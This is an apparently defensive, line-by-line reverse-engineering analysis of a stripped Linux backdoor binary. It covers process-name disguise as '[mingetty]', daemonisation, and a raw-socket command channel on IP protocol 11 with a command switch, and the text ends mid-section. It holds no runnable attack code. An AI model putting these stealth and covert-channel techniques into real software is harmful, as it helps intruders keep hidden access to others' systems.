Analysis

This analysis was written as a work in progress. It is not written as a review; it was written line-by-line during the disassembly process and, as such, shows all the ideas and methods used to draw the various conclusions about the binary.

People will find this useful if they:
 * Have a firm grasp on x86 assembly.
 * Are interested in investigating Linux binary files.
 * Have lots of time :)

It should be noted that this document was constructed over many nights and early mornings; as such, some things may make no sense...

A. Binary Analysis

i) Binary type:

    exploit-dev:/reverse# file the-binary
    the-binary: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, stripped

ii) Execution starting point:

Since the binary could well be quite smart (and it's stripped - ugh), we'll get ourselves a dump of the important parts of the ELF header:

    exploit-dev:/reverse# hexdump the-binary | head -n 2
    0000000 457f 464c 0101 0001 0000 0000 0000 0000
    0000010 0002 0003 0001 0000 8090 0804 0034 0000

The important part of this data is bytes 0000018 to 000001B, because this is "e_entry", the entry point for the code (little endian byte order - also obtained from the header). [see Elf32_Ehdr - elf.h]

    e_entry = 0x08048090

iii) The code is disassembled, starting from 0x08048090.

What is seen is quite standard C setup code. After following several calls and finding nothing tricky, we reach a set of instructions that appear to correspond to further coded execution points. These are:

    0x80480e1: call 0x8048080
    0x80480e6: call 0x8048134
    0x80480eb: pushl %eax
    0x80480ec: call 0x8055fbc

Analysis of the first call at 0x80480e1 shows it to resemble the initialisation section that calls any constructors and returns. Dumping the .ctors (constructors) section shows:

    (gdb) x/12b 0x80792ac
    0x80792ac: 0xff 0xff 0xff 0xff 0x00 0x00 0x00 0x00
    0x80792b4: 0xff 0xff 0xff 0xff

This indicates (and analysis of the call at 0x80480e1 shows) that there are no constructors!
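The e_entry lookup from section ii can also be done mechanically. The following is only a sketch: it rebuilds the first 32 bytes of the file from the hexdump words shown above (hexdump prints 16-bit little-endian words, so each pair is swapped back) and unpacks the fields around offset 0x18. The helper name parse_entry is made up for this illustration.

```python
import struct

# First 32 bytes of the-binary, transcribed from the hexdump output above.
# hexdump prints 16-bit little-endian words, so "457f" is the bytes 7f 45.
words = ("457f 464c 0101 0001 0000 0000 0000 0000 "
         "0002 0003 0001 0000 8090 0804 0034 0000").split()
header = b"".join(struct.pack("<H", int(w, 16)) for w in words)


def parse_entry(hdr):
    """Return (e_type, e_machine, e_entry) from a 32-bit LSB ELF header."""
    if hdr[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[4] is EI_CLASS (1 = 32-bit), e_ident[5] is EI_DATA (1 = LSB).
    if hdr[4] != 1 or hdr[5] != 1:
        raise ValueError("this sketch only handles 32-bit little-endian files")
    # After the 16-byte e_ident: e_type (2), e_machine (2), e_version (4), e_entry (4).
    e_type, e_machine, _e_version, e_entry = struct.unpack_from("<HHII", hdr, 16)
    return e_type, e_machine, e_entry


e_type, e_machine, e_entry = parse_entry(header)
print(hex(e_entry))
```

With a real file on disk, the same function could be fed the first 32 bytes read in binary mode instead of the transcribed words.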
Yet again, a whole lot of code analysis, with no secret special undercover bits found. While looking at this section, it should be noted that this is standard startup code, with the three calls above corresponding to the init, main, and exit code present in any standard elf32 gcc-compiled binary. (Running strings on the binary reveals that GNU GCC 2.7.2 appears to be the compiler used!)

iv) "main" Analysis - finally something of interest...

For the purposes of this analysis we'll term the memory reference at 0x8048134 "main", since this is probably what it would correspond to for the blackhat.

One thing can be noted straight off: this is NOT one of those short generic kiddie backdoors. It is long and complex and is a real *&^@#! because it's stripped, i.e. it is going to be an extremely long process to analyse it in any depth. Any shallow investigation of it will only lead to details being missed. With that said, however, the setup code here contains little that is new or specific to this binary. As such, the smaller details here will only be mentioned with assembly ranges rather than a full disassembly with line-by-line commentary. Anyone wishing to follow this section is advised to be running a disassembler on the binary in another console. ;)

Getting right into the code, we saw earlier the call to 0x8048134. This marks the start of the "main" code:

0x8048134 - 0x804817a:
generic function/variable setup.

0x804817b:
call 0x805720c

Inspection:

    0x805720f: movl $0x31,%eax
    0x8057214: int $0x80

[Quick howto for asm int $0x80 (calls 0x31 == 49)]

    exploit-dev:/reverse# grep -i "49" /usr/include/asm/unistd.h
    #define __NR_geteuid 49

Simply looks like generic geteuid() code.

0x8048180 - 0x804818a:
If we do not have root privs, we call 0x8055fbc. A quick look at the code of this function makes it look like exit() code - but this has not been checked in depth!!

0x804818c - 0x804819e:
I have never seen any compiler generate code like this section.
It has the effect of determining string length (it may possibly be some form of custom inline assembly?) [Later realised the binary has been compiled with optimisations, and this is more than likely an optimised strlen().]

0x804819f - 0x80481a7:
Unsure of function call. From the stack setup it looks to be function(pointer, 0, pointer). Possibly a memset(), but this needs to be verified with execution.

0x80481a8 - 0x80481cb:
A direct memory copy of 10 bytes from 0x80675d8.

    (gdb) x/1s 0x80675d8
    0x80675d8: "[mingetty]"

It is assumed this is an argv[0] replacement to hide the binary from programs such as ps. If so, then the previous section is more than likely a memset(), as assumed.

0x80481cc - 0x80481d4:
Call which eventually leads to:

    0x80574ef: movl $0x43,%eax
    0x80574f7: int $0x80

sigaction() call. Setup seems to be for signal(). The pushl's at 0x80481cc and 0x80481ce would correspond to signal(SIGCHLD, SIG_IGN). This means the parent process does not have to wait for the child process to finish.

0x80481d5 - 0x80481d9:
Call which eventually leads to:

    0x80571eb: movl $0x2,%eax
    0x80571f0: int $0x80

fork() call. This would explain the previous sigaction.

0x80481da - 0x80481e7:
If we are the parent, we call 0x8055fbc, which was earlier deemed to most likely be exit() code. Since this would be a common thing to do to daemonise code, it will be accepted that 0x8055fbc is indeed exit() code for the rest of this analysis.

0x80481e8 - 0x80481ec:
Call which eventually leads to:

    0x805733f: movl $0x42,%eax
    0x8057344: int $0x80

setsid() call.

0x80481ed - 0x8048208:
Identical signal() / fork() code. This will completely dissociate this process from any other.

0x804820c - 0x8048215:
Call which eventually leads to:

    0x8057138: movl $0xc,%eax
    0x8057140: int $0x80

chdir() call. The value pushed onto the stack just prior to the call:

    (gdb) x/1s 0x80675e3
    0x80675e3: "/"

This is an obvious attempt to change the current directory to /.
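The repeated "look up the number loaded into %eax before int $0x80" step lends itself to a small helper. The sketch below is an illustration only: the table holds just the five Linux i386 syscall numbers identified so far (as listed in asm/unistd.h), and the function name name_syscalls and the listing format it expects are assumptions made for this example.

```python
import re

# Linux i386 syscall numbers identified so far in this analysis (asm/unistd.h).
I386_SYSCALLS = {
    2: "fork",
    12: "chdir",
    49: "geteuid",
    66: "setsid",
    67: "sigaction",
}

MOV_EAX = re.compile(r"movl\s+\$(0x[0-9a-fA-F]+),%eax")


def name_syscalls(listing):
    """Yield (number, name) for each 'movl $N,%eax' later followed by 'int $0x80'."""
    pending = None
    for line in listing.splitlines():
        match = MOV_EAX.search(line)
        if match:
            pending = int(match.group(1), 16)
        elif "int" in line and "$0x80" in line and pending is not None:
            yield pending, I386_SYSCALLS.get(pending, "unknown")
            pending = None


listing = """\
0x805720f: movl $0x31,%eax
0x8057214: int $0x80
0x80574ef: movl $0x43,%eax
0x80574f7: int $0x80
0x80571eb: movl $0x2,%eax
0x80571f0: int $0x80
0x805733f: movl $0x42,%eax
0x8057344: int $0x80
0x8057138: movl $0xc,%eax
0x8057140: int $0x80
"""

found = list(name_syscalls(listing))
for number, name in found:
    print(number, name)
```

This is deliberately naive: it does not track intervening writes to %eax, so it is only a convenience for short wrapper functions like the ones above.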
0x8048216 - 0x804822a:
Call which eventually leads to:

    0x8057164: movl $0x6,%eax
    0x805716c: int $0x80

close() call. Three of these are called with stack setups which correspond to close(0), close(1), and close(2), effectively closing all 'normal' inherited file descriptors.

0x8048249 - 0x804824f:
Call which eventually leads to:

    0x8057448: movl $0xd,%eax
    0x8057450: int $0x80

time() call. The stack shows it is a time(0) call.

0x8048253 - 0x8048258:
Looks to be a function call using the return of time(0). The function seems very complex with regard to processing, but does not seem to have any significant purpose... The use of time(0) could suggest it is an srandom() call, but this is only a guess and it could be something written by the author themselves.

0x804825c - 0x8048266:
Call which eventually leads to:

    0x8056d0d: movl $0x1,%edx
    0x8056d15: movl $0x66,%eax
    0x8056d1a: movl %edx,%ebx
    0x8056d1c: int $0x80

socketcall. Checking %ebx reveals it is actually a call for socket(). A quick look at the stack setup shows pushes of 0xb, 0x3, 0x2, corresponding to a socket(2, 3, 11). A quick look in socket.h reveals it is: socket(AF_INET, SOCK_RAW, 11). My personal /etc/protocols doesn't have a type 11, nor could I find any reference to what actually uses this protocol. [Side note: curiosityLevel++]

0x804826d - 0x8048296:
Call which eventually leads to:

    0x80574ef: movl $0x43,%eax
    0x80574f7: int $0x80

sigaction again. More specifically, the author seems to call signal() yet again, 4 times. Each time the first value pushed (the second function parameter) is a 0x1, which corresponds to SIG_IGN. SIGHUP, SIGTERM, and SIGCHLD correspond to the other values, with SIGCHLD ignored twice for some reason...

0x80482b0 - 0x80482c9:
Call which eventually leads to:

    0x8056b63: movl $0xa,%edx
    0x8056b6b: movl $0x66,%eax
    0x8056b70: movl %edx,%ebx
    0x8056b72: int $0x80

socketcall. Once again, checking %ebx shows the call to be SYS_RECV.
Looking at the setup to the call:

    0x80482b0: pushl $0x0
    0x80482b2: pushl $0x800
    0x80482b7: leal 0xfffff800(%ebp),%eax
    0x80482bd: pushl %eax
    0x80482be: movl 0xffffbb38(%ebp),%ecx
    0x80482c4: pushl %ecx
    0x80482c5: call 0x8056b44

This corresponds to: recv(X, Y, 0x800, 0). It is assumed X is the previously created socket [Assumption later verified as correct], and Y is some buffer. This call will be a blocking call.

0x80482d5:
We continue down to the first of a series of checks:

    0x80482cf: movl 0xffffbb30(%ebp),%edx
    0x80482d5: cmpb $0xb,0x9(%edx)

Checking what 0xffffbb30(%ebp) really is (from earlier in the code):

    0x804814d: leal 0xfffff800(%ebp),%edx
    0x8048153: movl %edx,0xffffbb30(%ebp)

We can now see that (%edx) corresponds directly to the recv() buffer. Back to the compare statement, we can see that we compare the 10th byte of the packet to the value 0xb. We know that the socket is a raw socket, so it will fill in the buffer beginning with an IP header. A check of the IP header in ip.h shows the 10th byte should correspond to none other than the protocol. We end up comparing this to none other than 11. Considering the socket() call was for protocol 11, this is probably an unnecessary check...

0x80482e5:
Next check:

    0x80482df: movl 0xffffbb2c(%ebp),%ecx
    0x80482e5: cmpb $0x2,(%ecx)

Once again, checking what 0xffffbb2c(%ebp) really is:

    0x8048159: leal 0xfffff814(%ebp),%ecx
    0x804815f: movl %ecx,0xffffbb2c(%ebp)

So it appears (%ecx) will point 0x14 bytes into the recv() buffer. Nice and tidy that it points to just after a normal IP header (20 bytes)! We end up comparing the first byte of the after-IP-header data and checking that it is a 0x2.

0x80482ee:
Next check:

    0x80482ee: cmpl $0xc8,%esi
    0x80482f4: jle 0x8048eb8

We have to go back to see what %esi is:

    0x80482c5: call 0x8056b44
    0x80482ca: movl %eax,%esi

The "call 0x8056b44" was earlier seen to be a recv(). The next line will put the return of this function (the amount of data read by recv()) into %esi.
So when we do the cmpl statement, we're actually checking that the amount of data read is more than 0xc8 bytes (the jle takes the failure branch when %esi is less than or equal to 0xc8).

For the sake of loose ends, if any of these checks fail, execution jumps to 0x8048eb8, which is where we'll end up later anyway. These checks are a typical example of "if (check && check && check) { do things }". Whether the checks turn out true or false, we eventually end up at 0x8048eb8, which has:

    0x8048eb8: pushl $0x2710
    0x8048ebd: call 0x80555b0
    0x8048ec2: addl $0x4,%esp
    0x8048ec5: jmp 0x80482b0

The call at 0x80555b0 contains another call which eventually leads us to:

    0x80574a4: movl $0x52,%eax
    0x80574ac: int $0x80

A select() call with the following parameters:

    0x80555e7: pushl %eax
    0x80555e8: pushl $0x0
    0x80555ea: pushl $0x0
    0x80555ec: pushl $0x0
    0x80555ee: pushl $0x1
    0x80555f0: call 0x80574a0

This seemed rather odd until google showed the way. Pulled from the "Unix Programming Frequently Asked Questions":

    1.3 How can I sleep for less than a second?
    [...]
    * You can use select() or poll(), specifying no file descriptors to test; a common technique is to write a usleep() function based on either of these...

Looks like this function was simply a sleep or usleep call... (ugh #3 @ wasted time)

And as can be seen:

    0x8048ec5: jmp 0x80482b0

upon completion of the sleep, we jump back up to the recv() call in a continuous loop.

v) Core Functionality:

Section iv quickly looked at the coding that had gone into the initialisation of the binary. This section will now analyse the loop which, at a glance, looks to have quite a lot of functionality (hopefully containing something to make trudging through everything else worthwhile!). This section will be looked at in a LOT more detail, with a line-by-line commentary where particular areas are complex.

0x80482fa:
We return back to 0x80482fa.
This point should only be reached when the following conditions are met on a received packet:
 * IP Protocol is 11
 * 1st byte (assuming a 20 byte IP header) of the IP packet data must be a binary 0x2.
 * Packet length (including the IP header) must be greater than 0xc8 bytes (200 bytes).

Continuing analysis:

    0x80482fa: movl 0xffffbb20(%ebp),%edx
    0x8048300: pushl %edx
    0x8048301: movl 0xffffbb28(%ebp),%ecx
    0x8048307: pushl %ecx
    0x8048308: leal 0xffffffea(%esi),%eax
    0x804830b: pushl %eax
    0x804830c: call 0x804a1e8

The code at 0x804a1e8 does not appear to do anything system-related. Instead, it looks to do a form of memory manipulation. The following is a quick analysis of this function and how one can draw an educated guess as to its memory manipulation purpose:

It contains a single call to 0x804f808, which itself calls 0x804f820. Still nothing system-ish is called directly, even from this function; however, it sparks up a whole tree of calls:

    0x8061f34 - does memory manipulations
    0x8052e80 - seems to also do memory manipulations
              - I recognise some string-based optimised code such as strlen().
                Can't be sure that's what it is, but it is identical to the code
                earlier that I believe is a compiler-optimised strlen().
              - calls 0x8061b6c
              - calls 0x8066154 - contains function calls to munmap()
    0x804f888 - calls 0x8052de8
              - calls 0x805602c
              - follows some execution path I cannot follow...
    0x8061910 - unsure

This one call at 0x804a1e8 seems to be more about memory manipulation, possibly string-based, than anything else. It is probably not worth sifting through - at least for the moment. It would probably be better left for run-time debugging.

A quick look at the parameters passed to this function reveals the passing of 0xffffbb20(%ebp), 0xffffbb28(%ebp), and 0xffffffea(%esi).
Matching these up with appropriate data:

0xffffbb20(%ebp):
The last time 0xffffbb20(%ebp) was modified:

    0x8048297: leal 0xfffff000(%ebp),%ecx
    0x804829d: movl %ecx,0xffffbb20(%ebp)

There are no other references earlier in the code to 0xfffff000(%ebp). This address does, however, fall within the initial stack allocation at the very beginning of the program:

    0x8048137: subl $0x44f0,%esp

There seem to be at most 0x800 bytes until the next piece of data, which is referenced at 0x804814d. That next piece of data was the block of memory passed to recv() as the buffer, also with a size of 0x800. It is doubtful that this is a coincidence, and as such, 0xffffbb20(%ebp) is believed to point to a buffer of 0x800 bytes [Upon completion of analysis, no other data appears to be in this range, and the assumption of a size of 0x800 bytes is believed correct].

0xffffbb28(%ebp):
The last time 0xffffbb28(%ebp) was modified occurred at startup:

    0x8048165: leal 0xfffff816(%ebp),%edx
    0x804816b: movl %edx,0xffffbb28(%ebp)

As we saw earlier in the analysis of the packet checks, 0xfffff814(%ebp) points to directly after the IP header. 0xffffbb28(%ebp) holds a pointer to 0xfffff816(%ebp) which, as can be seen, is the 3rd byte of the IP packet data.

0xffffffea(%esi):
Remember that we are dealing with a leal statement this time; %esi at this point will still be equal to the amount of data returned by recv. 0xffffffea(%esi) will be a direct value of the amount of data received minus 0x16.

So the function call looks like this:

    function(AmountOfDataReceived-22, IP_Packet_Data, SomeBuffer)

where IP_Packet_Data starts at the 3rd byte of the data following the IP header.

NOTE: 0x804a1e8 will be analysed further in the function analysis section under the title of "Data_Manipulation_Function_A".
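Putting the three packet checks and the argument setup together, the receive-side logic can be modelled roughly as follows. This is a sketch under stated assumptions, not the binary's code: the name accept_packet is invented, the length test is done first here purely so the indexing is safe in Python (the binary tests protocol, first data byte, then length), and a fixed 20 byte IP header is assumed just as the binary assumes it.

```python
IP_HEADER_LEN = 20        # the binary assumes an IP header without options
PROTO_OFFSET = 9          # protocol field inside the IP header
MIN_LEN_EXCLUSIVE = 0xC8  # recv() must return MORE than this many bytes


def accept_packet(buf):
    """Return (payload, length) as handed to the decoder, or None if a check fails."""
    received = len(buf)
    if received <= MIN_LEN_EXCLUSIVE:   # cmpl $0xc8,%esi ; jle -> reject
        return None
    if buf[PROTO_OFFSET] != 0x0B:       # cmpb $0xb,0x9(%edx)
        return None
    if buf[IP_HEADER_LEN] != 0x02:      # cmpb $0x2,(%ecx)
        return None
    # The decoder gets a pointer 0x16 bytes into the buffer and a length of
    # (received - 0x16), matching leal 0xffffffea(%esi),%eax.
    return buf[IP_HEADER_LEN + 2:], received - 0x16


# A made-up 201 byte packet that satisfies all three checks.
packet = bytearray(201)
packet[PROTO_OFFSET] = 0x0B
packet[IP_HEADER_LEN] = 0x02
result = accept_packet(bytes(packet))
print(result[1])
```

Anything returning None here corresponds to the jump to 0x8048eb8 (sleep, then recv() again).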
0x8048314:
At this stage, it is assumed that the previous function, named "Data_Manipulation_Function_A", has quite possibly processed the IP packet data contents, and since it does not appear to do anything system-wise, it is assumed its purpose is some form of encryption processing on the packet [Later verified to be true - see Function Analysis section].

The first statement of this block is:

    movzbl 0xfffff001(%ebp),%eax

A look back at Data_Manipulation_Function_A shows the passing of 0xfffff000(%ebp) as the "SomeBuffer" (see function call appearance in previous section). %eax is loaded with the 2nd byte from this buffer.

0x804831b - 0x804832b:
At first glance, this section looks complex:

    0x804831b: decl %eax
    0x804831c: cmpl $0xb,%eax
    0x804831f: ja 0x8048eb8
    0x8048325: jmp *0x804832c(,%eax,4)

Experience allows this section to be easily identified as a typical implementation of a C switch() statement. This switch will be based upon the previously discussed 2nd byte from "SomeBuffer". The cmpl and ja statements are typical of a bounded switch statement, handling the situation where no case option is met. If this selected byte is greater than 12 (or is 0, since the decl wraps it around and ja is an unsigned comparison), execution will be directed to the familiar code at 0x8048eb8. As seen earlier, this jump simply results in a brief sleeping state, followed by a jump back to the recv() function.
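The decl / cmpl / ja / jmp sequence can be modelled in a few lines. The sketch below is illustrative only (the name dispatch_slot is invented); it returns the address of the jump table slot that the indirect jmp would read, or None when execution would fall through to the default at 0x8048eb8. The 32-bit mask mimics the register wrap-around that makes a command byte of 0 fail the unsigned comparison.

```python
JUMP_TABLE = 0x804832C   # base address used by jmp *0x804832c(,%eax,4)
MAX_INDEX = 0xB          # cmpl $0xb,%eax


def dispatch_slot(cmd_byte):
    """Return the jump table slot address for a command byte, or None for the default."""
    index = (cmd_byte - 1) & 0xFFFFFFFF   # decl %eax on a 32-bit register
    if index > MAX_INDEX:                 # ja: unsigned "above"
        return None
    return JUMP_TABLE + 4 * index         # each table entry is 4 bytes wide


for cmd in (0, 1, 12, 13):
    slot = dispatch_slot(cmd)
    print(cmd, hex(slot) if slot is not None else "default (0x8048eb8)")
```

So only command bytes 1 through 12 reach a case; everything else, including 0, is silently ignored.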
The jmp table would have to consist of 0xc entries (each of 4 bytes), and is located at 0x804832c:

    (gdb) x/48b 0x804832c
    0x804832c: 0x5c 0x83 0x04 0x08 0xf0 0x83 0x04 0x08
    0x8048334: 0x90 0x85 0x04 0x08 0x1c 0x87 0x04 0x08
    0x804833c: 0xc8 0x87 0x04 0x08 0x94 0x88 0x04 0x08
    0x8048344: 0xcc 0x8a 0x04 0x08 0x58 0x8b 0x04 0x08
    0x804834c: 0x80 0x8b 0x04 0x08 0x34 0x8c 0x04 0x08
    0x8048354: 0x08 0x8d 0x04 0x08 0xe4 0x8d 0x04 0x08

So in a more readable format:

    SomeBuffer[1]   jump address
    1               0x0804835c
    2               0x080483f0
    3               0x08048590
    4               0x0804871c
    5               0x080487c8
    6               0x08048894
    7               0x08048acc
    8               0x08048b58
    9               0x08048b80
    A               0x08048c34
    B               0x08048d08
    C               0x08048de4

 * NOTE: the decl %eax was taken into consideration, which is why our list starts at 1 instead of 0.

Case code (believe it or not, this is where things get complex!):

0x0804835c:
This section appears to have three parts.
 * Set up a buffer at 0xfffff800(%ebp)
 * Do memory manipulation on this buffer
 * Send special packets containing this manipulated data

The buffer setup starts off rather peculiarly. It uses a zero taken from memory to set 0xfffff800(%ebp) to 0. This was probably generated from a strcpy(Buffer, "") call that has been optimised by the compiler. It should be noted that 0xfffff800(%ebp) is the same buffer we used for recv(). It actually contains our original packet, so in effect we are making modifications to the original packet. Another 3 modifications are made (the first of which overwrites the 'strange' modification, which adds extra strangeness to it, although it could simply be a bug...).

The buffer at 0xfffff800(%ebp) has the following modifications:

    0xfffff800(%ebp) = 1 byte value from the heap at 0x807e77c. This heap position has not been modified in any way at program startup. It is probably a global variable that we will name "Global_A".
    0xfffff801(%ebp) = 1
    0xfffff802(%ebp) = 7

Another byte in the heap at 0x807e774 is now checked.
If it is non-zero, the following is done:

    0xfffff803(%ebp) = 1
    0xfffff804(%ebp) = byte value at 0x807e778

If it is zero:

    0xfffff803(%ebp) = 0

The following code is then followed under all conditions:

    0x80483a7: movl 0xffffbb20(%ebp),%edx
    0x80483ad: pushl %edx
    0x80483ae: leal 0xfffff800(%ebp),%eax
    0x80483b4: pushl %eax
    0x80483b5: pushl $0x190
    0x80483ba: call 0x804a194

The call, when analysed, exhibits functionality very similar to Data_Manipulation_Function_A; however, it is not identical. This function at 0x804a194 will be termed Data_Manipulation_Function_B and looked at in detail in the Function Analysis section.

0xffffbb20(%ebp) seems familiar, and when looking over the previous code, it is seen to still be 0xfffff000(%ebp). This is the 'buffer' that was earlier passed to Data_Manipulation_Function_A.

0xfffff800(%ebp) is also familiar, being the buffer that contains our original packet as received by recv(), with the modifications made earlier in this case section.

Finally, the value 0x190 is hardcoded and is passed to Data_Manipulation_Function_B, which suggests that this function is multi-purpose and not unique to this case section.

Next part of this section:

    0x80483bf: call 0x8056058
    0x80483c4: movl $0xc9,%ecx
    0x80483c9: cltd
    0x80483ca: idivl %ecx,%eax

It is unknown what purpose this serves; possibly key generation of some description, but this would be a wild guess. The call does not appear to do anything system-wise. Whatever the result, %eax appears to be the reason for these instructions since:

    0x80483ce: leal 0x190(%ebx),%eax
    0x80483d4: pushl %eax

This is the first parameter put on the stack for a new function we will look at shortly. This parameter is effectively 0x190 + the value in %ebx which was processed as part of the previous code.
[Note: this call at 0x8056058 has since been thought to be a random number generator; the code just after this call would indicate the result is then taken MOD 0xc9.]

The next parameter is already becoming quite familiar:

    0x80483d5: movl 0xffffbb20(%ebp),%edx
    0x80483db: pushl %edx

0xffffbb20(%ebp) is already familiar, as the 'buffer' that was passed to Data_Manipulation_Function_B.

The next parameter is new and has not yet been looked at:

    0x80483dc: movl 0xffffbb1c(%ebp),%ecx
    0x80483e2: pushl %ecx

0xffffbb1c(%ebp) falls directly before 0xffffbb20(%ebp), so it can be assumed that 0xffffbb1c(%ebp) is some form of 4 byte variable. This variable was set much earlier, just prior to the recv() call:

    0x80482a3: leal 0xffffee48(%ebp),%edx
    0x80482a9: movl %edx,0xffffbb1c(%ebp)

Looking at the contents of the stack at 0xffffee48(%ebp), the closest variable reference that can be found anywhere in the code appears to be:

    0x8048638: leal 0xffffee70(%ebp),%edx

This portion of code does appear to be a legitimate part of the program and will be analysed later. During this stage of analysis, the memory starting at 0xffffee48(%ebp) is suspected of being a buffer of at least 40 bytes. This portion of memory will be termed Buffer_A for the rest of this analysis.

With these variables on the stack:

    0x80483e3: call 0x8048ecc

Attempting to piece the function into a C format:

    function(Buffer_A, manipulated_buffer, 0x190 + X)

The function is normally reviewed prior to the parameters just to ensure it is a vital part of the code. This function was indeed quickly checked and has been determined to contain references to:

    0x8056d0d: movl $0x1,%edx
    0x8056d15: movl $0x66,%eax
    0x8056d1a: movl %edx,%ebx
    0x8056d1c: int $0x80

This corresponds to a socket() call, and as such the function will be reviewed later in the function analysis section. It has been termed Network_Function_A.

Upon completion of this code, a jump is followed back to 0x8048eb8.
As you may recognise, this is just before the sleeping state which is followed by the jump back to recv().

[This section is re-examined later when more information is known about the various buffers and especially Network_Function_A. The re-analysis is named Re-Examination_A.]

0x080483f0:
A lot of variable setup seems to occur in this section. Of note is the setting of the 0x807e780-0x807e783 range from the 17th to 20th bytes of the packet data from the recv() function. Also of note is that this is the destination IP for the packet (normally the IP of the machine running the binary).

One of the first few calls executed looks like this:

    0x804842d: pushl $0x0
    0x804842f: call 0x8057444
    0x8048434: addl $0x4,%esp
    0x8048437: pushl %eax
    0x8048438: call 0x80559a0

These two calls were analysed earlier when they were called from 0x8048249. At that point, the first call was deemed to be a time(0), and the second was suspected (but by no means confirmed) to be an srandom() call using the time(0) return as a parameter.

A new function call then appears:

    0x8048440: call 0x8056058

This function seems to have only one purpose, which is to call another:

    0x805605b: call 0x8055e38

This one is not recognised either, and following it does not unleash its secrets. It seems to read from 0x8078958, but it is unknown just what is at this location at this time. Given the suspected srandom(), it is quite possible this is some kind of random number function! This makes a lot of sense given the next piece of code:

    0x8048445: movl $0xa,%ecx
    0x804844a: cltd
    0x804844b: idivl %ecx,%eax

This looks simply like MOD code: idivl leaves the quotient in %eax and the remainder in %edx, so %edx will always hold a value from 0 to 9.

The next section is quite complex. A full analysis will be needed. We enter the section with our 'probable' random value from 0 to 9 in %edx.

A long look at the code flow of the following shows it to be a loop.
It looks like %ebx takes a counter and pointer role, seeing the loop through the values 0 through to 9 (which would make sense considering the 0 to 9 random value, copied from %edx into %edi at 0x804844d):

    0x804844d: movl %edx,%edi
    0x804844f: xorl %ebx,%ebx
    0x8048451: xorl %esi,%esi
    0x8048453: nop
    0x8048454: cmpl %edi,%ebx
    0x8048456: je 0x804852b
    0x804845c: cmpl $0x2,0x807e784
    0x8048463: jne 0x8048498
    [...]
    0x804852e: incl %ebx
    0x804852f: cmpl $0x9,%ebx
    0x8048532: jle 0x8048454

The core of the code (inside the loop) consists of conditional sections, all of it encapsulated by the conditional at 0x8048454. A further (and much more important) conditional is located at 0x804845c. It splits the rest of the loop contents into two parts, and seems to be conditional on a value stored at 0x807e784. This value was set earlier in this very same case section:

    0x80483f0: movzbl 0xfffff002(%ebp),%edx
    0x80483f7: movl %edx,0x807e784

And once again we see the familiar 0xfffff000(%ebp) range. As a reminder, this is the data buffer passed to Data_Manipulation_Function_A earlier. As we can see, the 3rd byte is used for setting the contents of 0x807e784, which due to its location can be assumed to be a global variable. Since it seems it could be of importance, we'll name it "Global_B".

With the flow sorted out, let's now look at what purpose this section could possibly play.

Firstly, we have a loop that relies on a variable that is never modified within the loop. This ensures it will repeat 10 times. To simplify what is going on, the first conditional will play a role. It will trigger on all values 0 to 9 except the one that is equal to our 'random 0 to 9' number. The reason behind leaving this one out will be seen later.

As for what all this code does, it seems to want to set values in the memory pointed to by 0xffffbb1c(%ebp). This just happens to be a buffer we've already identified as Buffer_A.
It works like this:

    If Global_B (set by third byte in the manipulated buffer) = 2
        Buffer_A will be set directly to contents of the manipulated buffer.
    Else
        Buffer_A's contents will be set using random numbers.

It's not quite as simple as a direct memory fill. Buffer_A seems to be structured in 4 byte increments, and the buffer is either copied or filled with random numbers accordingly. We had an earlier assumption that Buffer_A is 40 bytes long. Given that this loop iterates 10 times and fills 4 bytes at a time, I think this assumption can now be accepted as true.

After this loop completes:

    0x8048538: movl 0x807e784,%eax
    0x804853d: testl %eax,%eax
    0x804853f: jne 0x8048543
    0x8048541: xorl %edi,%edi

0x807e784 is Global_B. In effect, if Global_B = 0 then we'll xor out %edi to 0. %edi doesn't seem to be a permanent variable of any kind, and is used a short time after this check:

    0x8048543: cmpl $0x2,%eax
    0x8048546: je 0x8048eb8

In effect, this will compare Global_B to 0x2. If it is equal, it will jmp off to 0x8048eb8, which should now be familiar as a break from the switch().

At this point, we engage in a 4 byte copy from the manipulated buffer:

    0x8048555: movb 0xfffff003(%ebp),%al
    0x804855b: movl 0xffffbb1c(%ebp),%ecx
    0x8048561: movb %al,(%edi,%ecx,1)
    [....]

After this we break from the switch and jmp off to 0x8048eb8, ready to sleep and recv() all over again.

This section's purpose is still in the dark; however, I am sure all will be revealed as soon as Buffer_A's purpose can be identified.

[This section is re-examined later when more information is known about the various buffers. The re-analysis is named Re-Examination_A.]

0x08048590:
The very first thing we do here is call 0x80571e8, which is our fork code. Very interesting. Just as interesting is this:

    0x8048595: movl %eax,0x807e770
    0x804859a: testl %eax,%eax
    0x804859c: jne 0x8048eb8

Effectively, if the parent processes this code, the PID of the child will be stored at 0x807e770.
We'll name this heap variable PID_Var_A. Continuing: if we are the parent, we will simply end this case code and return to the main recv() loop.

If we are the child, there is a lot more interesting stuff to be done. Very first is a call to 0x805733c, which corresponds to a setsid() (not confirmed at this point). Following this:

    0x80485a7: pushl $0x1
    0x80485a9: pushl $0x11
    0x80485ab: call 0x80569bc
    0x80485b0: call 0x80571e8

The 0x80569bc call with this stack setup would correspond to:

    signal(SIGCHLD, SIG_IGN)

This is immediately followed by another fork() call, which does something interesting.

If %eax is >0 (if we are the parent process)

Execute the following:

    0x80485bc: pushl $0xa
    0x80485be: call 0x80556cc
    0x80485c3: pushl $0x9
    0x80485c5: movl 0x807e770,%eax
    0x80485ca: pushl %eax
    0x80485cb: call 0x80572b0
    0x80485d0: pushl $0x0
    0x80485d2: call 0x8055fbc

0x80556cc has not yet been identified. So we go look... This function calls:

    0x8057360:
        0x8057364: movl $0x7e,%eax
        0x8057372: int $0x80
        This corresponds to sigprocmask()

    0x80574c8:
        0x80574ef: movl $0x43,%eax
        0x80574f7: int $0x80
        This corresponds to sigaction()

    0x8057444 = time() (already identified)

    0x8057418:
        0x805741c: movl $0x1b,%eax
        0x8057421: movl 0x8(%ebp),%ebx
        0x8057424: int $0x80
        This corresponds to alarm()

    0x805751c:
        0x8057522: movl $0x48,%eax
        0x8057530: int $0x80
        This corresponds to sigsuspend()

The function still cannot be satisfactorily identified; however, it is possibly a sleep(), which would indicate the function at 0x80555b0 is not sleep() (it might be a usleep()). If this function IS indeed a sleep(), then it should be easily verifiable during runtime analysis. Assuming this function is a sleep(), a 10 second sleep occurs.

Returning to 0x80485cb, a call of 0x80572b0 is executed. This function is also not known, so....
    0x80572b4: movl $0x25,%eax
    0x80572bf: int $0x80

This corresponds to a kill().

Just for ease, we'll reshow the code from above:

    0x80485c3: pushl $0x9
    0x80485c5: movl 0x807e770,%eax
    0x80485ca: pushl %eax
